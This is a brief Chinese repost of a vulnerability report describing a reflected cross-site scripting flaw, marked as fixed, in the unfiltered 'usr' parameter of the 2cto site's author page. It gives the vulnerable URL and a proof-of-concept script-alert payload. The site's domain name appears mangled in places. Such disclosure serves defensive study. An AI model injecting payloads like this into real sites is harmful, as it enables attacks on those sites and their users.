红黑联盟xss 作者:h3art http://HdhCmsTest2cto测试数据/index.php?m=content&c=index&a=author&usr= 未对usr进行过滤 现在usr后面随便输入一个 http://HdhCmsTest2cto测试数据/index.php?m=content&c=index&a=author&usr=admin 查看 源码 然后改变usr后面的值为xss代码http://HdhCmsTest2cto测试数据/index.php?m=content&c=index&a=author&usr=<script>alert(/xsstest/)</scrip>
查看更多关于自学php一个xss[已修复] - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15042